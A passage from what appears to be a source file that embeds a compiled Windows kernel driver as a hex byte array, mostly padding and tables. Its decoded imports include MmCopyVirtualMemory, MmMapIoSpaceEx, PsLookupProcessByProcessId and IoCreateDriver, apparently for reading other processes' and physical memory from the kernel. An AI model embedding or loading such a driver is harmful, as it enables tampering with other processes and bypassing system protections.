0x00, 532 | 0x18, 0x54, 0x0D, 0x00, 0x18, 0x34, 0x0C, 0x00, 0x18, 0x72, 0x14, 0xF0, 533 | 0x12, 0xE0, 0x10, 0x70, 0x02, 0x0D, 0x06, 0x00, 0x02, 0x16, 0x00, 0x06, 534 | 0x0D, 0x34, 0x0E, 0x00, 0x0D, 0xB2, 0x06, 0x50, 0x02, 0x04, 0x03, 0x00, 535 | 0x01, 0x16, 0x00, 0x06, 0x04, 0x62, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 536 | 0x00, 0x00, 0x00, 0x00, 0x02, 0x01, 0x03, 0x00, 0x02, 0x06, 0x09, 0x06, 537 | 0x01, 0x70, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x0B, 0x08, 0x00, 538 | 0x08, 0x16, 0x00, 0x06, 0x0B, 0x52, 0x07, 0x00, 0x06, 0x10, 0x05, 0x20, 539 | 0x04, 0x80, 0x02, 0x90, 0x02, 0x06, 0x04, 0x00, 0x02, 0x06, 0x03, 0x06, 540 | 0x06, 0x12, 0x02, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 541 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 542 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 543 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 544 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 545 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 546 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 547 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 548 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 549 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 550 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 551 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 552 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 553 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 554 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 555 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 556 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 557 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 558 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 559 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 560 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 561 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 562 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 563 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 564 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 565 | 0x32, 0xA2, 0xDF, 0x2D, 0x99, 0x2B, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 566 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 567 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 568 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 569 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 570 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 571 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 572 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 573 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 574 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 575 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 576 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 577 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 578 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 579 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 580 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 581 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 582 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 583 | 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 584 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 585 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 586 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 587 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 588 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 589 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 590 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 591 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 592 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 593 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 594 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 595 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 596 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 597 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 598 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 599 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 600 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 601 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 602 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x35, 0x10, 0x00, 0x00, 603 | 0xD4, 0x24, 0x00, 0x00, 0x40, 0x10, 0x00, 0x00, 0x5D, 0x10, 0x00, 0x00, 604 | 0x64, 0x24, 0x00, 0x00, 0x60, 0x10, 0x00, 0x00, 0x3C, 0x11, 0x00, 0x00, 605 | 0xC4, 0x24, 0x00, 0x00, 0x3C, 0x11, 0x00, 0x00, 0x84, 0x11, 0x00, 0x00, 606 | 0x9C, 0x24, 0x00, 0x00, 0x84, 0x11, 0x00, 0x00, 0xA9, 0x11, 0x00, 0x00, 607 | 0x64, 0x24, 0x00, 0x00, 0xAC, 0x11, 0x00, 0x00, 0x13, 0x12, 0x00, 0x00, 608 | 0x40, 0x24, 0x00, 0x00, 0x14, 0x12, 0x00, 0x00, 0x84, 
0x12, 0x00, 0x00, 609 | 0x64, 0x24, 0x00, 0x00, 0x84, 0x12, 0x00, 0x00, 0xF5, 0x12, 0x00, 0x00, 610 | 0x9C, 0x24, 0x00, 0x00, 0xF8, 0x12, 0x00, 0x00, 0xD8, 0x13, 0x00, 0x00, 611 | 0x88, 0x24, 0x00, 0x00, 0xE0, 0x13, 0x00, 0x00, 0xA8, 0x15, 0x00, 0x00, 612 | 0xA8, 0x24, 0x00, 0x00, 0xA8, 0x15, 0x00, 0x00, 0x3E, 0x17, 0x00, 0x00, 613 | 0x70, 0x24, 0x00, 0x00, 0x40, 0x17, 0x00, 0x00, 0xB4, 0x17, 0x00, 0x00, 614 | 0x4C, 0x24, 0x00, 0x00, 0xC0, 0x17, 0x00, 0x00, 0x75, 0x18, 0x00, 0x00, 615 | 0x0C, 0x25, 0x00, 0x00, 0xA0, 0x18, 0x00, 0x00, 0xA5, 0x18, 0x00, 0x00, 616 | 0xE0, 0x24, 0x00, 0x00, 0xC0, 0x18, 0x00, 0x00, 0xC6, 0x18, 0x00, 0x00, 617 | 0xE0, 0x24, 0x00, 0x00, 0x00, 0x19, 0x00, 0x00, 0xAA, 0x1B, 0x00, 0x00, 618 | 0xE0, 0x24, 0x00, 0x00, 0xC0, 0x1B, 0x00, 0x00, 0xC7, 0x1C, 0x00, 0x00, 619 | 0xE0, 0x24, 0x00, 0x00, 0x00, 0x1D, 0x00, 0x00, 0x43, 0x1D, 0x00, 0x00, 620 | 0xE8, 0x24, 0x00, 0x00, 0x80, 0x1D, 0x00, 0x00, 0xA6, 0x1D, 0x00, 0x00, 621 | 0xF8, 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 622 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 623 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 624 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 625 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 626 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 627 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 628 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 629 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 630 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 631 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 632 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 633 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 634 | 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 635 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 636 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 637 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 638 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 639 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 640 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 641 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 642 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 643 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 644 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 645 | 0x28, 0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 646 | 0xF6, 0x51, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 647 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 648 | 0x00, 0x00, 0x00, 0x00, 0xA8, 0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 649 | 0xC0, 0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xD0, 0x50, 0x00, 0x00, 650 | 0x00, 0x00, 0x00, 0x00, 0xE2, 0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 651 | 0xF4, 0x50, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0A, 0x51, 0x00, 0x00, 652 | 0x00, 0x00, 0x00, 0x00, 0x1C, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 653 | 0x34, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4A, 0x51, 0x00, 0x00, 654 | 0x00, 0x00, 0x00, 0x00, 0x62, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 655 | 0x72, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x90, 0x51, 0x00, 0x00, 656 | 0x00, 0x00, 0x00, 0x00, 0xA2, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 657 | 0xB8, 0x51, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xDA, 0x51, 0x00, 0x00, 658 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 659 | 0x3A, 0x09, 0x52, 0x74, 0x6C, 0x49, 0x6E, 0x69, 0x74, 0x55, 0x6E, 0x69, 
660 | 0x63, 0x6F, 0x64, 0x65, 0x53, 0x74, 0x72, 0x69, 0x6E, 0x67, 0x00, 0x00, 661 | 0x28, 0x09, 0x52, 0x74, 0x6C, 0x47, 0x65, 0x74, 0x56, 0x65, 0x72, 0x73, 662 | 0x69, 0x6F, 0x6E, 0x00, 0x4D, 0x06, 0x4D, 0x6D, 0x55, 0x6E, 0x6D, 0x61, 663 | 0x70, 0x49, 0x6F, 0x53, 0x70, 0x61, 0x63, 0x65, 0x00, 0x00, 0x1E, 0x06, 664 | 0x4D, 0x6D, 0x4D, 0x61, 0x70, 0x49, 0x6F, 0x53, 0x70, 0x61, 0x63, 0x65, 665 | 0x45, 0x78, 0x00, 0x00, 0x76, 0x04, 0x49, 0x6F, 0x66, 0x43, 0x6F, 0x6D, 666 | 0x70, 0x6C, 0x65, 0x74, 0x65, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 667 | 0x00, 0x00, 0x43, 0x03, 0x49, 0x6F, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 668 | 0x44, 0x65, 0x76, 0x69, 0x63, 0x65, 0x00, 0x00, 0x50, 0x03, 0x49, 0x6F, 669 | 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x53, 0x79, 0x6D, 0x62, 0x6F, 0x6C, 670 | 0x69, 0x63, 0x4C, 0x69, 0x6E, 0x6B, 0x00, 0x00, 0x88, 0x03, 0x49, 0x6F, 671 | 0x47, 0x65, 0x74, 0x43, 0x75, 0x72, 0x72, 0x65, 0x6E, 0x74, 0x50, 0x72, 672 | 0x6F, 0x63, 0x65, 0x73, 0x73, 0x00, 0xFB, 0x06, 0x4F, 0x62, 0x66, 0x44, 673 | 0x65, 0x72, 0x65, 0x66, 0x65, 0x72, 0x65, 0x6E, 0x63, 0x65, 0x4F, 0x62, 674 | 0x6A, 0x65, 0x63, 0x74, 0x00, 0x00, 0xF0, 0x05, 0x4D, 0x6D, 0x43, 0x6F, 675 | 0x70, 0x79, 0x4D, 0x65, 0x6D, 0x6F, 0x72, 0x79, 0x00, 0x00, 0xE9, 0x07, 676 | 0x50, 0x73, 0x4C, 0x6F, 0x6F, 0x6B, 0x75, 0x70, 0x50, 0x72, 0x6F, 0x63, 677 | 0x65, 0x73, 0x73, 0x42, 0x79, 0x50, 0x72, 0x6F, 0x63, 0x65, 0x73, 0x73, 678 | 0x49, 0x64, 0x00, 0x00, 0x46, 0x03, 0x49, 0x6F, 0x43, 0x72, 0x65, 0x61, 679 | 0x74, 0x65, 0x44, 0x72, 0x69, 0x76, 0x65, 0x72, 0x00, 0x00, 0xF1, 0x05, 680 | 0x4D, 0x6D, 0x43, 0x6F, 0x70, 0x79, 0x56, 0x69, 0x72, 0x74, 0x75, 0x61, 681 | 0x6C, 0x4D, 0x65, 0x6D, 0x6F, 0x72, 0x79, 0x00, 0xB0, 0x07, 0x50, 0x73, 682 | 0x47, 0x65, 0x74, 0x50, 0x72, 0x6F, 0x63, 0x65, 0x73, 0x73, 0x53, 0x65, 683 | 0x63, 0x74, 0x69, 0x6F, 0x6E, 0x42, 0x61, 0x73, 0x65, 0x41, 0x64, 0x64, 684 | 0x72, 0x65, 0x73, 0x73, 0x00, 0x00, 0xFB, 0x0B, 0x5A, 0x77, 0x51, 0x75, 685 | 0x65, 0x72, 0x79, 0x53, 0x79, 0x73, 0x74, 
0x65, 0x6D, 0x49, 0x6E, 0x66, 686 | 0x6F, 0x72, 0x6D, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x00, 0x00, 0x6E, 0x74, 687 | 0x6F, 0x73, 0x6B, 0x72, 0x6E, 0x6C, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x00, 688 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 689 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 690 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 691 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 692 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 693 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 694 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 695 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 696 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 697 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 698 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 699 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 700 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 701 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 702 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 703 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 704 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 705 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 706 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 707 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 708 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 709 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 710 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 711 | 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 712 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 713 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 714 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 715 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 716 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 717 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 718 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 719 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 720 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 721 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 722 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 723 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 724 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 725 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 726 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 727 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 728 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 729 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 730 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 731 | 0x80, 0xA0, 0x88, 0xA0, 0x90, 0xA0, 0x98, 0xA0, 0xA0, 0xA0, 0x28, 0xA1, 732 | 0x40, 0xA1, 0x48, 0xA1, 0x50, 0xA1, 0xE8, 0xA1, 0xF0, 0xA1, 0xF8, 0xA1, 733 | 0x00, 0xA2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 734 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 735 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 736 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 737 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 738 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 739 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 740 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 741 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 742 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 743 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 744 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 745 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 746 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 747 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 748 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 749 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 750 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 751 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 752 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 753 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 754 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 755 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 756 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 757 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 758 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 759 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 760 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 761 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 762 | 0x00, 0x00, 0x00, 0x00, 0x00, 
